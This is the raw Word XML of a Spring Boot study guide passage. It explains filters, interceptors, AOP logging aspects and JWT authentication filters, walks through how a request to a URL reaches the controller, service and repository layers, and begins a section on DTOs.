    <w:p w14:paraId="7CB21B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7C6AB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stroy() {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBFA50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22BD5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ustomFilter intercepts the request and prints the HTTP method of the incoming request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B485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register the filter, you can create a FilterRegistrationBean in a @Configuration class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366D0D5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0A68B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FilterConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6049D62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BA949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FilterRegistrationBean&lt;CustomFilter&gt; loggingFilter() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786CB14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RegistrationBean&lt;CustomFilter&gt; registrationBean = new FilterRegistrationBean&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD91E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setFilter(new CustomFilter());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30860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addUrlPatterns("/api/*");  // Apply filter to all API URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20269C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gistrationBean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0453E0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F2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0B1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD2A79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are commonly used for tasks like authentication, logging, and modifying the response before sending it to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0621A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have access to the HandlerMethod, which represents the actual method being executed by a controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18453D8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Interceptor</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33568A0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9F9556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Interceptor implements HandlerInterceptor {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D3E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7594F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preHandle(HttpServletRequest request, HttpServletResponse response, Object handler)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68398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011AC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before the controller method is invoked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4B503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URL: " + request.getRequestURL());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36524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 // Continue processing the request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC06D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A3CEB21" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1523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C10649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ostHandle(HttpServletRequest request, HttpServletResponse response, Object handler,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEFA3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delAndView modelAndView) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63619E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controller method is invoked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3316FF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5EA007" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D2DEB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35A71E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fterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673A2D6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3DEC82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request has been completely processed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3548672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939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8138F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ister the interceptor in a configuration class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61846B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3014853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1E487E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E271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CustomInterceptor customInterceptor;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0968AB" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30011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4DA5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Interceptors(InterceptorRegistry registry) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372C87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Interceptor(customInterceptor).addPathPatterns("/api/**"); // Apply to specific paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4261E1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023C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0E0A9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pect-Oriented Programming (AOP)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D1809D"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spect and @Around annotations, you can create custom aspects that are executed before or after the actual method call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B79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Logging Aspect</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2320E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pect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB2493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AF69C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LoggingAspect {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337A6E08" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADC08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round("execution(* com.example.controller.*.*(..))")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663401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bject logRestCall(ProceedingJoinPoint joinPoint) throws Throwable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742EE9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 before method execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D1400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Intercepting method: " + joinPoint.getSignature().getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649139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bject result = joinPoint.proceed();  // Proceed with the actual method execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325BE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sponse details after method execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADDF3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Method executed: " + joinPoint.getSignature().getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCC8A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ult;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F49C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72B95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115F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spect intercepts the controller methods and logs the method name before and after execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8D765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 Filters</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D01573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only authorized users can access specific REST endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0410F0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Spring Security Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E21D1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3581E3A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AuthenticationFilter extends OncePerRequestFilter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530651C8" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="347C4B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F6E6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69932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4E2D71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JWT token from request header and validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407888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6B0C58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53A904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and validate JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162501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tring jwtToken = token.substring(7);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B5266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validateToken(jwtToken)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548F8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et the security context if token is valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221186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getAuthentication(jwtToken));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15534A7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5CDD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A74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2D523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EB5F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EBE4CE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Call Happens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7599087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 makes a REST call</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., GET, POST) to a Spring Boot API endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE5BEA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if configured) first intercept the request and can log, authenticate, or modify the request before passing it to the controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD0D4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if configured) may also process the request at various stages, such as before or after the controller method is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287FBF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configured, the SecurityFilterChain or custom security filters will validate the request (e.g., checking JWT tokens or session cookies).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E7DF4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 interacts with services or repositories, and returns a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256C90F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processing</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> happens through interceptors (e.g., modifying the response) or aspects (e.g., logging).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510116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sent back to the client, either after filters or interceptors modify it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BEEDD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4B7161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are used to intercept requests and responses at the servlet level for tasks like logging or authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED83B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offer more control at the Spring MVC layer, providing hooks before and after controller execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4870F1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OP</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows cross-cutting concerns like logging and security to be applied declaratively without changing the underlying logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE50A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ilters are used to secure the REST endpoints by intercepting and validating requests based on security configurations (e.g., JWT token validation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BEBB9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of these mechanisms can intercept REST calls and add functionality like logging, security, or response modification in a Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C0F8FA" w14:textId="59125DA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676" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E57BD66" w14:textId="32CEDA32" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="654" w:name="_Toc197867868"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>When I hit a URL how data will be invoked with your application</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="654"/>
    </w:p>
    <w:p w14:paraId="764FC504" w14:textId="1DA5CC95"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hit a URL in a Spring Boot application, the following steps take place to invoke the relevant data or process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D462A0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 Received by the Server (Tomcat/Embedded Server):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C841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send a request (e.g., via a browser or Postman) to a URL (e.g., http://localhost:8080/api/resource), the request is first received by the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>embedded server</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (typically, Tomcat, Jetty, or Undertow) that Spring Boot uses by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1891A39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RL Matching by DispatcherServlet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263E19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Spring MVC, and its job is to dispatch incoming HTTP requests to the appropriate controller method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3752B8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configured in Spring Boot through the application.properties or application.yml file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8FE2D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matches the URL of the request with the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> configured in the controller classes via annotations like @RequestMapping, @GetMapping, @PostMapping, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FECBB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 Mapping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED920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annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to map the URL to a particular controller method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD176A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0C1818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 and @RequestMapping map the incoming URL to a specific method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A927C2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GetMapping("/api/resource") annotation will map the GET request at /api/resource to the method inside the controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B26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774A7F1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FFA56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41D40D97" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F1A252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29105E6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74034ED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new ResponseEntity&lt;&gt;("Data from API", HttpStatus.OK);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF486B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E1EB9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1794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the URL http://localhost:8080/api/resource, the getResource() method is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AFEA7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Business Logic):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC1EE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controller method is invoked, the controller typically calls a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to handle business logic, interact with databases, or perform computations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E101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ervice layer might interact with a </w:t>
      </w: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xml:space="preserve"> (for database interaction via JPA or JDBC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FCD42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0E6481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DA9C6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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DADD8D5" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="316421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fetchData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6968AE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rom a database or business logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7004542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etched Data from Database";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711E92D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F562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CA31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n call the service layer method to fetch the data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D2D3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A07F4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0E3A70D2" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7306D7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89446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ourceService resourceService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B654B9A" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18121B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09BAAA5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592462B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resourceService.fetchData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EC65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HttpStatus.OK);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF164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372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D9D49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Database Interaction):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBD11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data needs to be fetched from a database, the service layer calls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interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7350610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the repository layer is typically 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that uses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o query the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA6F22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38A4AD6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209CAC7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ResourceRepository extends JpaRepository&lt;Resource, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35915A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database queries can be added here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245AF09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CBF824"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Data Processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFB548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method interacts with the database, processes the request (e.g., fetching data, updating data), and returns the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE64B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receives the data and prepares it to send back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDF0DE3"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Response Sent Back to Client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B247FC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the controller receives the processed data from the service layer, it wraps the data into an appropriate response (e.g., ResponseEntity, ModelAndView).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5246C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ponse is then sent back to the client with the HTTP status code, headers, and body as necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00180D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Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C8C0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8C0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ssage": "Data from API",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EF4D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atus": "success"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B72A6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7C96CB"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 Status Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB1B8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handles HTTP status codes based on the response. For example, HttpStatus.OK means a successful response with a 200 status code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3305760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f an error occurs, Spring Boot can return error status codes (e.g., HttpStatus.NOT_FOUND for a missing resource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738E779C"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orkflow for a GET Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8F7F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Sends a GET request to http://localhost:8080/api/resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B82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The request is routed to the appropriate controller method (ResourceController#getResource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37C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The controller method calls the service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BE3F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If necessary, the service layer fetches data from the database using the repository layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528884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Queries the database (if needed) to fetch the required data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A49F6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The controller returns the data to the client in the form of a response body (usually JSON).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626FCD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The client receives the response with the data and status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7624A2C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Key Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7685538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 arrives</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E34F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dentifies the correct controller method based on the URL mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7266C3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handles the logic, possibly interacting with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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B64D1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Data is processed, and the </w:t>
      </w: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returned back to the client with the relevant HTTP status and data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BFEA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a basic flow for how data is invoked when hitting a URL in a Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFD3D9D" w14:textId="2AE8127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677" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37962A49" w14:textId="0605221F" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="655" w:name="_Toc197867869"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How is the DTO getting invoked with REST endpoints</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="655"/>
    </w:p>
    <w:p w14:paraId="45823B62" w14:textId="7ACD75B7"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TOs (Data Transfer Objects)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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how a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DTO</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> gets invoked with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in a Spring Boot application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4746E41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the DTO (Data Transfer Object)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A9A4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DTO</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245691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DTO {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2817F1DA" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A60D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267FC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5A4C5D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3EA37204" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
